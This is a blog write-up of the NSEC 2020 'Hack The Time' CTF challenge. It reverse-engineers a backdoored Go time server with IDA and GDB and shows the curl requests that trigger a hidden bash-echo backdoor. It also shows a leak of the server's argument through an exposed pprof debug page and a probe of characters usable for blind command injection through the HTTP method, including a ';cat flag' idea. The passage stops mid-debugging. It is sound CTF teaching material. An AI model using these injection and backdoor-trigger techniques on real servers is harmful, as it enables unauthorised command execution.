πŸ”’
❌
There are new articles available, click to refresh the page.
βœ‡Bad Sector Labs Blog

Hack The Time - NSEC CTF 2020

By: Erik β€”

Overview

Note: This writeup and the challenge binary are available on GitHub.

This is a walk-through of "Hack The Time" a 4-point challenge from the 2020 NSEC CTF. It was a great challenge that required static analysis, dynamic analysis, web skills, Go knowledge, and some creative Bash foo to solve. This was team effort with help from two of my teammates (finding the arg and some bash foo).

Props to @becojo for a great challenge!

Challenge

Classes are sooooooo long and I’m bored af. There is a rumour that the student that developped the service that controls
the school’s clock added a backdoor to change the time. It is still running to this day… It would be really cool if 
you can find it :wink:

I was able to get a copy of the binary if that helps you: https://dl.nsec/time_server [note binary included in this repo]

The school server is running at http://time-server.ctf:8080.

Solution

Web


Browsing to http://time-server.ctf:8080/ displays a simple clock with the current time.

The source of the page is below:

<!doctype html>
<html lang="en">
<head>
   <meta charset="UTF-8"/>
   <title>Document</title>
   <link href="/styles.css" rel="stylesheet"/>
</head>
<body>
   <div id="clock">
      <svg viewBox="0 0 40 40">
      <circle cx="20" cy="20" r="19" />
      <g class="marks">
         <line x1="15" y1="0" x2="16" y2="0" />
         <line x1="15" y1="0" x2="16" y2="0" />
         <line x1="15" y1="0" x2="16" y2="0" />
         <line x1="15" y1="0" x2="16" y2="0" />
         <line x1="15" y1="0" x2="16" y2="0" />
         <line x1="15" y1="0" x2="16" y2="0" />
         <line x1="15" y1="0" x2="16" y2="0" />
         <line x1="15" y1="0" x2="16" y2="0" />
         <line x1="15" y1="0" x2="16" y2="0" />
         <line x1="15" y1="0" x2="16" y2="0" />
         <line x1="15" y1="0" x2="16" y2="0" />
         <line x1="15" y1="0" x2="16" y2="0" />
      </g>

      <line x1="0" y1="0" x2="9" y2="0" class="hour" />
      <line x1="0" y1="0" x2="13" y2="0" class="minute" />
      <line x1="0" y1="0" x2="16" y2="0" class="seconds" />
      <circle cx="20" cy="20" r="0.7" class="pin" />

      <text x="-3" y="0"></text>
      </svg>
   </div>

   <div id="time"></div>

   <script src="/script.js"></script>
</body>
</html>

/script.js:

async function main() {
    var res = await fetch('/time.json');
    var {0: j} = await res.json();

    document.querySelector('svg text').textContent = j;

    var svg = document.querySelector('svg');
    var date = new Date(Date.parse(j));

    svg.style.setProperty('--start-seconds', date.getSeconds());
    svg.style.setProperty('--start-minutes', date.getMinutes());
    svg.style.setProperty('--start-hours', date.getHours() % 12);
}

main();

setInterval(main, 5000);

This script fetches /time.json every 5 seconds. /time.json is an array of the current time, such as: ["2020-05-16 09:53:24"]

styles.css just contains CSS to make the clock. I don't have the original CSS due to how I solved the challenge and local testing.

That is the extent of the website; no obvious backdoors exposed. Let's look at the binary.

Static Analysis


Opening the binary in IDA Pro we see lots of go_ and net_http__ functions.

main.main

So we have a Go binary. It's a mess, but golang_loader_assist helps resolve function names and strings, and generally makes it a little more pleasant to work with.

You can see in the screenshot above of main.main there are two handlers being registered, /time.json and /, which makes sense given what we saw on the challenge site. There are no other handlers, so the backdoor isn't as easy as /cmd or similar.

Let's look at the /time.json handler (main_timeHandler)

timeHandler

It gets the current time (time_Now), formats it (time_Time_Format), coverts it to a string (runtime_convTstring), and finally prints it (fmt_Fprintf). Nothing jumps out as being a backdoor, so let's move on for now. We can come back and reverse engineer this function in more depth if we don't find anything else.

How about main_root the handler for /?

main_root

Nothing super interesting. Follow the rabbit hole down main_root_func1.

main_root_func1

Keep going into main_e

main_e

Well well well. net_http__Request_FormValue with a strange string mlaasdkfasldkfm. This feels like a backdoor. How can we send that string to have it read by FormValue? To the docs!

// FormValue returns the first value for the named component of the query.
// POST and PUT body parameters take precedence over URL query string values.
// FormValue calls ParseMultipartForm and ParseForm if necessary and ignores
// any errors returned by these functions.
// If key is not present, FormValue returns the empty string.
// To access multiple values of the same key, call ParseForm and
// then inspect Request.Form directly.

Since we know that / works with GET, we must have to send that string as "name component of the query" aka a GET parameter. The string will be the "key" and whatever it's value is will be returned by FormValue. Something like:

curl -v http://127.0.0.1:8080/?mlaasdkfasldkfm=test

Ok so that should get us to the jbe short loc_76320C test. What is that checking? Since this is a 64bit ELF, we can see if IDA's pseudocode helps any:

main_e_code

If something is <=1 it will panic, but we're not quite sure what that something is. Looking further to line 17, there are two checks against something related to os_Args (os_Args + 24 and os_Args +16). If all three of these checks pass, the program will call main_rr. Let's look at main_rr, with a mental note to come back and figure out what these checks are for.

main_rr

As soon as we see os_exec_Command:

there_it_is

At this point we're confident we have found the backdoor, but it looks like it has additional checks and it isn't obvious what those checks are for. It's time for dynamic analysis.

Dynamic Analysis


Before you start any GDB adventures with Go binaries, the Go documentation on GDB integration is required reading.

For this challenge my .gdbinit file contained the following:

source ~/peda/peda.py
set auto-load safe-path $debugdir:$datadir/auto-load:/usr/local/go/src/runtime
source /usr/local/go/src/runtime/runtime-gdb.py
set follow-fork-mode parent # this keeps GDB on the main binary if it forks any children (shells, etc)

I am using peda to make GDB a little more friendly.

Let's dig into the binary. First, get it open in GDB: gdb ./time_server

Now we load the function of interest and set a break point at it.

gdb-peda$ l main.e
16      in /app/main.go
gdb-peda$ b main.e
Breakpoint 1 at 0x763160: file /app/main.go, line 21.
gdb-peda$ r
Starting program: /mnt/hgfs/nsec/time/time_server 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[New Thread 0x7ffff5b6d700 (LWP 33773)]
[New Thread 0x7ffff536c700 (LWP 33774)]
[New Thread 0x7ffff4b6b700 (LWP 33775)]
[New Thread 0x7fffeffff700 (LWP 33776)]
[New Thread 0x7fffef7fe700 (LWP 33777)]
[New Thread 0x7fffeeffd700 (LWP 33778)]

At this point the time_server is running and waiting for connections on port 8080. Based on our static analysis, we know it will look for a form value of mlaasdkfasldkfm but not sure what happens after. Let's find out! In a different terminal, send a request like so, using a dummy value of test for the form key discovered earlier:

$ curl -v http://127.0.0.1:8080/?mlaasdkfasldkfm=test
*   Trying 127.0.0.1:8080...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> GET /?mlaasdkfasldkfm=test HTTP/1.1
> Host: 127.0.0.1:8080
> User-Agent: curl/7.68.0
> Accept: */*
> 

Now this request hangs open, as the time_server is paused at our break point. Switching back to the first terminal we see:

Thread 3 "time_server" hit Breakpoint 1, main.e (r=0xc000134500) at /app/main.go:21
21      in /app/main.go
gdb-peda$ 

Perfect, let's step forward to the values being loaded before the first comparison by disassembling main.e and setting a breakpoint at the mov before the cmp after the call to FormValue. Note: you may have to c (continue) a few times before breakpoint 2 hits.

gdb-peda$ disas main.e
Dump of assembler code for function main.e:
=> 0x0000000000763160 <+0>:     mov    rcx,QWORD PTR fs:0xfffffffffffffff8
   0x0000000000763169 <+9>:     cmp    rsp,QWORD PTR [rcx+0x10]
   0x000000000076316d <+13>:    jbe    0x76321a <main.e+186>
   0x0000000000763173 <+19>:    sub    rsp,0x30
   0x0000000000763177 <+23>:    mov    QWORD PTR [rsp+0x28],rbp
   0x000000000076317c <+28>:    lea    rbp,[rsp+0x28]
   0x0000000000763181 <+33>:    mov    rax,QWORD PTR [rsp+0x38]
   0x0000000000763186 <+38>:    mov    QWORD PTR [rsp],rax
   0x000000000076318a <+42>:    lea    rcx,[rip+0xd9133]        # 0x83c2c4
   0x0000000000763191 <+49>:    mov    QWORD PTR [rsp+0x8],rcx
   0x0000000000763196 <+54>:    mov    QWORD PTR [rsp+0x10],0xf
   0x000000000076319f <+63>:    call   0x6c3610 <net/http.(*Request).FormValue>
   0x00000000007631a4 <+68>:    mov    rax,QWORD PTR [rsp+0x20]
   0x00000000007631a9 <+73>:    mov    rcx,QWORD PTR [rsp+0x18]
   0x00000000007631ae <+78>:    mov    rdx,QWORD PTR [rip+0x3fa883]        # 0xb5da38 <os.Args+8>
   0x00000000007631b5 <+85>:    mov    rbx,QWORD PTR [rip+0x3fa874]        # 0xb5da30 <os.Args>
   0x00000000007631bc <+92>:    cmp    rdx,0x1
   0x00000000007631c0 <+96>:    jbe    0x76320c <main.e+172>
   0x00000000007631c2 <+98>:    mov    rdx,QWORD PTR [rbx+0x10]
   0x00000000007631c6 <+102>:   cmp    QWORD PTR [rbx+0x18],rax
   0x00000000007631ca <+106>:   je     0x7631d6 <main.e+118>
   0x00000000007631cc <+108>:   mov    rbp,QWORD PTR [rsp+0x28]
   0x00000000007631d1 <+113>:   add    rsp,0x30
   0x00000000007631d5 <+117>:   ret    
   0x00000000007631d6 <+118>:   mov    QWORD PTR [rsp],rcx
   0x00000000007631da <+122>:   mov    QWORD PTR [rsp+0x8],rdx
   0x00000000007631df <+127>:   mov    QWORD PTR [rsp+0x10],rax
   0x00000000007631e4 <+132>:   call   0x402dc0 <runtime.memequal>
   0x00000000007631e9 <+137>:   cmp    BYTE PTR [rsp+0x18],0x0
   0x00000000007631ee <+142>:   je     0x7631cc <main.e+108>
   0x00000000007631f0 <+144>:   mov    rax,QWORD PTR [rsp+0x38]
   0x00000000007631f5 <+149>:   mov    rcx,QWORD PTR [rax+0x8]
   0x00000000007631f9 <+153>:   mov    rax,QWORD PTR [rax]
   0x00000000007631fc <+156>:   mov    QWORD PTR [rsp],rax
   0x0000000000763200 <+160>:   mov    QWORD PTR [rsp+0x8],rcx
   0x0000000000763205 <+165>:   call   0x762fe0 <main.rr>
   0x000000000076320a <+170>:   jmp    0x7631cc <main.e+108>
   0x000000000076320c <+172>:   mov    eax,0x1
   0x0000000000763211 <+177>:   mov    rcx,rdx
   0x0000000000763214 <+180>:   call   0x460370 <runtime.panicIndex>
   0x0000000000763219 <+185>:   nop
   0x000000000076321a <+186>:   call   0x45da80 <runtime.morestack_noctxt>
   0x000000000076321f <+191>:   jmp    0x763160 <main.e>
End of assembler dump.
gdb-peda$ b *0x00000000007631ae
Breakpoint 2 at 0x7631ae: file /app/main.go, line 22.
gdb-peda$ c
Continuing.
[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x1 
RCX: 0x0 
RDX: 0x0 
RSI: 0xc0001440ae ("asldkfm HTTP/1.1")
RDI: 0x83c2cc ("asldkfmms: gomaxprocs=negative offsetnegative updatenetwork is downno dot in fieldno medium foundno such processnon-minimal tagnot a directorynshortparallel;ntriangleright;num_symbols: 1\nrecord overfl"...)
RBP: 0xc00013cb40 --> 0xc00013cb80 --> 0xc00013cba8 --> 0xc00013cc08 --> 0xc00013cc38 --> 0xc00013cfb8 (--> ...)
RSP: 0xc00013cb18 --> 0xc000134500 --> 0xc0001440a0 ("GET /?mlaasdkfasldkfm HTTP/1.1")
RIP: 0x7631ae (<main.e+78>:     mov    rdx,QWORD PTR [rip+0x3fa883]        # 0xb5da38 <os.Args+8>)
R8 : 0x1 
R9 : 0x12 
R10: 0x8b5768 --> 0x807060504030201 
R11: 0x1 
R12: 0xffffffffffffffff 
R13: 0x12 
R14: 0x11 
R15: 0x200
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x76319f <main.e+63>:        call   0x6c3610 <net/http.(*Request).FormValue>
   0x7631a4 <main.e+68>:        mov    rax,QWORD PTR [rsp+0x20]
   0x7631a9 <main.e+73>:        mov    rcx,QWORD PTR [rsp+0x18]
=> 0x7631ae <main.e+78>:        mov    rdx,QWORD PTR [rip+0x3fa883]        # 0xb5da38 <os.Args+8>
   0x7631b5 <main.e+85>:        mov    rbx,QWORD PTR [rip+0x3fa874]        # 0xb5da30 <os.Args>
   0x7631bc <main.e+92>:        cmp    rdx,0x1
   0x7631c0 <main.e+96>:        jbe    0x76320c <main.e+172>
   0x7631c2 <main.e+98>:        mov    rdx,QWORD PTR [rbx+0x10]
[------------------------------------stack-------------------------------------]
0000| 0xc00013cb18 --> 0xc000134500 --> 0xc0001440a0 ("GET /?mlaasdkfasldkfm HTTP/1.1")
0008| 0xc00013cb20 --> 0x83c2c4 ("mlaasdkfasldkfmms: gomaxprocs=negative offsetnegative updatenetwork is downno dot in fieldno medium foundno such processnon-minimal tagnot a directorynshortparallel;ntriangleright;num_symbols: 1\nrecor"...)
0016| 0xc00013cb28 --> 0xf 
0024| 0xc00013cb30 --> 0x0 
0032| 0xc00013cb38 --> 0x0 
0040| 0xc00013cb40 --> 0xc00013cb80 --> 0xc00013cba8 --> 0xc00013cc08 --> 0xc00013cc38 --> 0xc00013cfb8 (--> ...)
0048| 0xc00013cb48 --> 0x7635ed (<main.root.func1+61>:  mov    rax,QWORD PTR [rsp+0x20])
0056| 0xc00013cb50 --> 0xc000134500 --> 0xc0001440a0 ("GET /?mlaasdkfasldkfm HTTP/1.1")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Thread 3 "time_server" hit Breakpoint 2, 0x00000000007631ae in main.e (r=0xc000134500) at /app/main.go:22
22      in /app/main.go
gdb-peda$ x/1x 0xb5da38
0xb5da38 <os.Args+8>:   0x0000000000000001
gdb-peda$ 

The last command run above examines 1 byte in hex at address 0xb5da38 and we see that it is 1. GDB with the help of the Go python script we sourced helpfully annotated this as os.Args+8. The Go docs describe os.Args as a string array that holds the command-line arguments, starting with the program name. The value we read that will be compared against 1 indicates that this is the length of os.Args which makes since, as we did not run it with any arguments. To validate this, we restart the program with an argument and re-issue the curl request.

gdb-peda$ kill
[Inferior 1 (process 33769) killed]
gdb-peda$ r testarg
Starting program: /mnt/hgfs/nsec/time/time_server testarg
---8<---snip---8<----
Thread 1 "time_server" hit Breakpoint 2, 0x00000000007631ae in main.e (r=0xc0000ea100) at /app/main.go:22
22      in /app/main.go
gdb-peda$ x/1x 0xb5da38
0xb5da38 <os.Args+8>:   0x0000000000000002

right.gif

Ok, so we can past the first comparison. What about the second? If we step a few instructions forward (si) to the next cmp we see this:

gdb-peda$ si
[----------------------------------registers-----------------------------------]
RAX: 0x4 
RBX: 0xc00009e020 --> 0x7fffffffe517 ("/mnt/hgfs/nsec/time/time_server")
RCX: 0x0 
RDX: 0x7fffffffe537 --> 0x67726174736574 ('testarg')
RSI: 0xc00001df8e ("asldkfm=test HTTP/1.1")
RDI: 0x83c2cc ("asldkfmms: gomaxprocs=negative offsetnegative updatenetwork is downno dot in fieldno medium foundno such processnon-minimal tagnot a directorynshortparallel;ntriangleright;num_symbols: 1\nrecord overfl"...)
RBP: 0xc000043b40 --> 0xc000043b80 --> 0xc000043ba8 --> 0xc000043c08 --> 0xc000043c38 --> 0xc000043fb8 (--> ...)
RSP: 0xc000043b18 --> 0xc0000ea400 --> 0xc000206e00 ("GET /?mlaasdkfasldkfm HTTP/1.1")
RIP: 0x7631c6 (<main.e+102>:    cmp    QWORD PTR [rbx+0x18],rax)
R8 : 0x1 
R9 : 0x0 
R10: 0x8b5768 --> 0x807060504030201 
R11: 0x1 
R12: 0xffffffffffffffff 
R13: 0x83 
R14: 0x82 
R15: 0x200
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7631bc <main.e+92>:        cmp    rdx,0x1
   0x7631c0 <main.e+96>:        jbe    0x76320c <main.e+172>
   0x7631c2 <main.e+98>:        mov    rdx,QWORD PTR [rbx+0x10]
=> 0x7631c6 <main.e+102>:       cmp    QWORD PTR [rbx+0x18],rax
   0x7631ca <main.e+106>:       je     0x7631d6 <main.e+118>
   0x7631cc <main.e+108>:       mov    rbp,QWORD PTR [rsp+0x28]
   0x7631d1 <main.e+113>:       add    rsp,0x30
   0x7631d5 <main.e+117>:       ret
[------------------------------------stack-------------------------------------]
0000| 0xc000043b18 --> 0xc0000ea400 --> 0xc000206e00 ("GET /?mlaasdkfasldkfm HTTP/1.1")
0008| 0xc000043b20 --> 0x83c2c4 ("mlaasdkfasldkfmms: gomaxprocs=negative offsetnegative updatenetwork is downno dot in fieldno medium foundno such processnon-minimal tagnot a directorynshortparallel;ntriangleright;num_symbols: 1\nrecor"...)
0016| 0xc000043b28 --> 0xf 
0024| 0xc000043b30 --> 0x0 
0032| 0xc000043b38 --> 0x0 
0040| 0xc000043b40 --> 0xc000043b80 --> 0xc000043ba8 --> 0xc000043c08 --> 0xc000043c38 --> 0xc000043fb8 (--> ...)
0048| 0xc000043b48 --> 0x7635ed (<main.root.func1+61>:  mov    rax,QWORD PTR [rsp+0x20])
0056| 0xc000043b50 --> 0xc0000ea400 --> 0xc000206e00 ("GET /?mlaasdkfasldkfm HTTP/1.1")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x00000000007631c6      22      in /app/main.go
gdb-peda$ x/1x $rbx+0x18
0xc00000e0b8:   0x0000000000000007

The comparison is between $rbx+0x18 which is 7 and RAX which is 4, so we fail this check. How are the 7 and 4 being set? Looking at the values we control, testarg is 7 characters and test from the curl command is 4 characters. Seems like a safe bet these need to be equal in order to pass this check. In GDB we continue (c) to let the request finish, then fire another curl in the second terminal.

curl -v http://127.0.0.1:8080/?mlaasdkfasldkfm=testarg

Back in GDB we see:

[----------------------------------registers-----------------------------------]
RAX: 0x7 
---8<---snip---8<----
[-------------------------------------code-------------------------------------]
   0x7631bc <main.e+92>:        cmp    rdx,0x1
   0x7631c0 <main.e+96>:        jbe    0x76320c <main.e+172>
   0x7631c2 <main.e+98>:        mov    rdx,QWORD PTR [rbx+0x10]
=> 0x7631c6 <main.e+102>:       cmp    QWORD PTR [rbx+0x18],rax
   0x7631ca <main.e+106>:       je     0x7631d6 <main.e+118>
---8<---snip---8<----
Thread 1 "time_server" hit Breakpoint 5, 0x00000000007631c6 in main.e (r=0xc0000ca100) at /app/main.go:22
22      in /app/main.go
gdb-peda$ x/1x $rbx+0x18
0xc00000e0b8:   0x0000000000000007

Bingo, another check passed. Let's keep going by setting a breakpoint on the call to runtime.memequal.

gdb-peda$ b *0x00000000007631e4
Breakpoint 6 at 0x7631df: file /app/main.go, line 22.
gdb-peda$ c
Continuing.
[----------------------------------registers-----------------------------------]
RAX: 0x7 
RBX: 0xc00000e0a0 --> 0x7fffffffe53d ("/time_server")
RCX: 0xc00001c136 ("testarg HTTP/1.1")
RDX: 0x7fffffffe54a --> 0x67726174736574 ('testarg')
---8<---snip---8<----
[-------------------------------------code-------------------------------------]
   0x7631d6 <main.e+118>:       mov    QWORD PTR [rsp],rcx
   0x7631da <main.e+122>:       mov    QWORD PTR [rsp+0x8],rdx
   0x7631df <main.e+127>:       mov    QWORD PTR [rsp+0x10],rax
=> 0x7631e4 <main.e+132>:       call   0x402dc0 <runtime.memequal>
   0x7631e9 <main.e+137>:       cmp    BYTE PTR [rsp+0x18],0x0
   0x7631ee <main.e+142>:       je     0x7631cc <main.e+108>
   0x7631f0 <main.e+144>:       mov    rax,QWORD PTR [rsp+0x38]
   0x7631f5 <main.e+149>:       mov    rcx,QWORD PTR [rax+0x8]
No argument
[------------------------------------stack-------------------------------------]
0000| 0xc0000d7b18 --> 0xc00001c136 ("testarg HTTP/1.1")
0008| 0xc0000d7b20 --> 0x7fffffffe54a --> 0x67726174736574 ('testarg')
0016| 0xc0000d7b28 --> 0x7 
---8<---snip---8<----

Looking at the stack we can make a safe bet that this is comparing the value of the FormValue with the first argument to time_server for 7 characters. Since they are equal, we should pass this check and finally get to our backdoor in main.rr. Let's set a breakpoint and find out.

gdb-peda$ l main.rr
7       in /app/main.go
gdb-peda$ b main.rr
Breakpoint 8 at 0x762fe0: file /app/main.go, line 12.
gdb-peda$ c
---8<---snip---8<----
Thread 1 "time_server" hit Breakpoint 6, main.rr (s=...) at /app/main.go:12
12      in /app/main.go

Excellent, we have successfully reached the backdoor code. What does it actually do? We saw in the static analysis a call to runtime_concatstring2 with the string echo (with the space) and then a call to os_exec_Command with the string bash involved. If we let the code run, we should see something echoed to the gdb terminal.

gdb-peda$ c
Continuing.
[Detaching after vfork from child process 37627]
GET

GET!?! That is not what I expected. The only place we have GET is in the HTTP request. It appears the backdoor will echo the HTTP verb if the form values are set correctly. Let's validate our hypothesis by sending a POST instead of a GET.

curl -v http://127.0.0.1:8080/?mlaasdkfasldkfm=testarg -X POST
$ gdb ./time_server 
---8<---snip---8<----
gdb-peda$ r testarg
Starting program: ./time_server testarg
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[New Thread 0x7ffff5b6d700 (LWP 37657)]
[New Thread 0x7ffff536c700 (LWP 37658)]
[New Thread 0x7ffff4b6b700 (LWP 37659)]
[New Thread 0x7fffeffff700 (LWP 37660)]
[New Thread 0x7fffef7fe700 (LWP 37661)]
[New Thread 0x7fffeeffd700 (LWP 37662)]
[Detaching after vfork from child process 37665]
POST

Confirmed. What we have so far is a few checks and then an echo of the HTTP verb from the request. Somehow, we need to use this to get a flag from the server. Let's review the checks first:

  1. Is the a form key of mlaasdkfasldkfm?
  2. Is there at least one argument to the server?
  3. Does the argument length equal the length of the value with the key mlaasdkfasldkfm?
  4. Does the argument match the value of the form with key mlaasdkfasldkfm?

If those 4 checks are passed, then we run bash -c echo [HTTP verb from request]. At this point we have two issues:

  1. What is the argument to the server binary on the challenge server?
  2. How do you read a flag value using only HTTP verb values?

Exploitation


First, we need to get the argument on the running challenge server. At this point one of my teammates posted in our chat:

chat: http://time-server.ctf:8080/debug/pprof/etc/services doesn't 404

He was using Ghidra, and when I posted the mlaasdkfasldkfm string in chat he searched for it.

ghidra search

Right clicking and copying the value in "String view" gives you a very large string that contains "/debug/pprof//etc/services" near the top.

pprof string

Browsing to http://time-server.ctf:8080/debug/pprof shows an interesting page. pprof is a Go standard library tool for profiling.

prof

The "cmdline" link looks especially interesting. What does it hold?

cmdline

Awesome! One issue solved.

teamwork

Now for how to read a flag from a server using an HTTP verb (or something that the server things is an HTTP verb) and bash. We know our verb is being passed to bash, so ideally we just send ;cat flag and get the flag. Remember however, that the echo is local to the server which makes our command injection blind. We'll have to figure out a way to get the output of the command, but first, what commands can we run? For this I just threw every character one at a time as the HTTP verb noting which characters caused the challenge to return a 400 Bad Request.

$ curl -v http://127.0.0.1:8080/?mlaasdkfasldkfm=testarg -X ':'
*   Trying 127.0.0.1:8080...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> : /?mlaasdkfasldkfm=testarg HTTP/1.1
> Host: 127.0.0.1:8080
> User-Agent: curl/7.68.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 400 Bad Request
< Content-Type: text/plain; charset=utf-8
< Connection: close
< 
* Closing connection 0
400 Bad Request

After testing, I had the following list: ={}[]<>():;"\/ (a space is the last character in that list). That's pretty restrictive, as most everything we would want to do in bash would involve a slash and a space.

As a CTF participant and security researcher I've escaped my way out of a fair number of character restricted command injections, but this one really upped the difficulty. A common trick to get around space restriction is with input/output redirection (< and >) but those are restricted as well. ${IFS} is another favorite, but curly braces are restricted. We better hope the flag is in the current directory as / is restricted.

throwing a wrench

Footage of @becojo (the challenge designer) and me working on the challenge. I'm in the green shirt.

We do have some key characters available, specifically &, |, and `.

Let's take stock of our current status:

  1. We have no way of seeing the output of the command as it is local to the server
  2. We can pass arbitrary strings to bash -c echo with lots of restrictions

We know we are working with a webserver, and it's a safe bet to guess it is serving static files from somewhere. This could be the same directory as the time_server binary, or perhaps /var/www/html. If you've cloned the repository where this writeup lives you have the answer already, but assume you don't know. We have the binary, let's work through how to figure it out. We notice that running ./time_server locally fails to return any HTML and panics.

$ ./time_server 
2020/05/19 15:50:42 http: panic serving 127.0.0.1:59798: runtime error: index out of range [1] with length 1
goroutine 34 [running]:
net/http.(*conn).serve.func1(0xc00011e000)
        /usr/local/go/src/net/http/server.go:1767 +0x139
panic(0x806b60, 0xc0000fa060)
        /usr/local/go/src/runtime/panic.go:679 +0x1b2
main.e(0xc00013e000)
        /app/main.go:22 +0xb9
main.root.func1(0x8c89e0, 0xc0001060e0, 0xc00013e000)
        /app/main.go:29 +0x3d
net/http.HandlerFunc.ServeHTTP(0xc0000f60c0, 0x8c89e0, 0xc0001060e0, 0xc00013e000)
        /usr/local/go/src/net/http/server.go:2007 +0x44
net/http.(*ServeMux).ServeHTTP(0xb5e260, 0x8c89e0, 0xc0001060e0, 0xc00013e000)
        /usr/local/go/src/net/http/server.go:2387 +0x1bd
net/http.serverHandler.ServeHTTP(0xc000106000, 0x8c89e0, 0xc0001060e0, 0xc00013e000)
        /usr/local/go/src/net/http/server.go:2802 +0xa4
net/http.(*conn).serve(0xc00011e000, 0x8c9320, 0xc0000781c0)
        /usr/local/go/src/net/http/server.go:1890 +0x875
created by net/http.(*Server).Serve
        /usr/local/go/src/net/http/server.go:2928 +0x384

Let's look at main.main where the errors originate in GDB.

$ gdb ./time_server 
---8<---snip---8<----
gdb-peda$ l main.main
35      /app/main.go: No such file or directory.
gdb-peda$ disas main.main
Dump of assembler code for function main.main:
   0x00000000007633d0 <+0>:     mov    rcx,QWORD PTR fs:0xfffffffffffffff8
   0x00000000007633d9 <+9>:     cmp    rsp,QWORD PTR [rcx+0x10]
   0x00000000007633dd <+13>:    jbe    0x76359b <main.main+459>
   0x00000000007633e3 <+19>:    sub    rsp,0x60
   0x00000000007633e7 <+23>:    mov    QWORD PTR [rsp+0x58],rbp
   0x00000000007633ec <+28>:    lea    rbp,[rsp+0x58]
   0x00000000007633f1 <+33>:    lea    rax,[rip+0x6fe08]        # 0x7d3200
   0x00000000007633f8 <+40>:    mov    QWORD PTR [rsp],rax
   0x00000000007633fc <+44>:    call   0x40e370 <runtime.newobject>
   0x0000000000763401 <+49>:    mov    rax,QWORD PTR [rsp+0x8]
   0x0000000000763406 <+54>:    mov    QWORD PTR [rsp+0x40],rax
   0x000000000076340b <+59>:    lea    rcx,[rip+0x15f88e]        # 0x8c2ca0 <go.itab.net/http.Dir,net/http.FileSystem>
   0x0000000000763412 <+66>:    mov    QWORD PTR [rax],rcx
   0x0000000000763415 <+69>:    lea    rcx,[rip+0x156504]        # 0x8b9920
   0x000000000076341c <+76>:    mov    QWORD PTR [rax+0x8],rcx
---8<---snip---8<----

That http.FileSystem looks interesting. Set a breakpoint on it and continue.

gdb-peda$ b *0x000000000076340b
Breakpoint 1 at 0x76340b: file /usr/local/go/src/net/http/fs.go, line 716.
gdb-peda$ r testarg
Starting program: /mnt/hgfs/nsec/time/time_server testarg
---8<---snip---8<----
[----------------------------------registers-----------------------------------]
RAX: 0xc0000fa0f0 --> 0x0 
RBX: 0x0 
RCX: 0x7ffff7d8f6d0 --> 0x79055 
RDX: 0x79055 
RSI: 0x10 
RDI: 0x10 
RBP: 0xc000101f50 --> 0xc000101f58 --> 0x4321be (<runtime.main+542>:    mov    eax,DWORD PTR [rip+0x74895c]        # 0xb7ab20 <runtime.runningPanicDefers>)
RSP: 0xc000101ef8 --> 0x7d3200 --> 0x10 
RIP: 0x76340b (<main.main+59>:  lea    rcx,[rip+0x15f88e]        # 0x8c2ca0 <go.itab.net/http.Dir,net/http.FileSystem>)
R8 : 0x12 
R9 : 0x12 
R10: 0x8b5769 --> 0x908070605040302 
R11: 0x1 
R12: 0xffffffffffffffff 
R13: 0x10 
R14: 0xf 
R15: 0x200
EFLAGS: 0x216 (carry PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7633fc <main.main+44>:     call   0x40e370 <runtime.newobject>
   0x763401 <main.main+49>:     mov    rax,QWORD PTR [rsp+0x8]
   0x763406 <main.main+54>:     mov    QWORD PTR [rsp+0x40],rax
=> 0x76340b <main.main+59>:     lea    rcx,[rip+0x15f88e]        # 0x8c2ca0 <go.itab.net/http.Dir,net/http.FileSystem>
   0x763412 <main.main+66>:     mov    QWORD PTR [rax],rcx
   0x763415 <main.main+69>:     lea    rcx,[rip+0x156504]        # 0x8b9920
   0x76341c <main.main+76>:     mov    QWORD PTR [rax+0x8],rcx
   0x763420 <main.main+80>:     nop
[------------------------------------stack-------------------------------------]
0000| 0xc000101ef8 --> 0x7d3200 --> 0x10 
0008| 0xc000101f00 --> 0xc0000fa0f0 --> 0x0 
0016| 0xc000101f08 --> 0xc000000180 --> 0xc000100000 --> 0xc000102000 --> 0x0 
0024| 0xc000101f10 --> 0xc000101f50 --> 0xc000101f58 --> 0x4321be (<runtime.main+542>:  mov    eax,DWORD PTR [rip+0x74895c]        # 0xb7ab20 <runtime.runningPanicDefers>)
0032| 0xc000101f18 --> 0x40714f (<runtime.closechan+479>:       jmp    0x40716e <runtime.closechan+510>)
0040| 0xc000101f20 --> 0xc000086058 --> 0x0 
0048| 0xc000101f28 --> 0x0 
0056| 0xc000101f30 --> 0x0 
[------------------------------------------------------------------------------]

Hmm nothing obvious yet. Step forward a few instructions.

gdb-peda$ ni # a few of these
[----------------------------------registers-----------------------------------]
RAX: 0xc0000fa0f0 --> 0x8c2ca0 --> 0x7cc380 --> 0x10 
RBX: 0x0 
RCX: 0x8b9920 --> 0x8383c4 ("static/stoppedsubdot;subset;subsim;subsub;subsup;succeq;supdot;supset;supsim;supsub;supsup;swarhk;swnwar;syscalltarget;tcaron;tcedil;telrec;there4;thetav;thinsp;thksim;timesb;timesd;topbot;topcir;tpri"...)
RDX: 0x79055 
RSI: 0x10 
RDI: 0x10 
RBP: 0xc000101f50 --> 0xc000101f58 --> 0x4321be (<runtime.main+542>:    mov    eax,DWORD PTR [rip+0x74895c]        # 0xb7ab20 <runtime.runningPanicDefers>)
RSP: 0xc000101ef8 --> 0x7d3200 --> 0x10 
RIP: 0x76341c (<main.main+76>:  mov    QWORD PTR [rax+0x8],rcx)
R8 : 0x12 
R9 : 0x12 
R10: 0x8b5769 --> 0x908070605040302 
R11: 0x1 
R12: 0xffffffffffffffff 
R13: 0x10 
R14: 0xf 
R15: 0x200
EFLAGS: 0x216 (carry PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
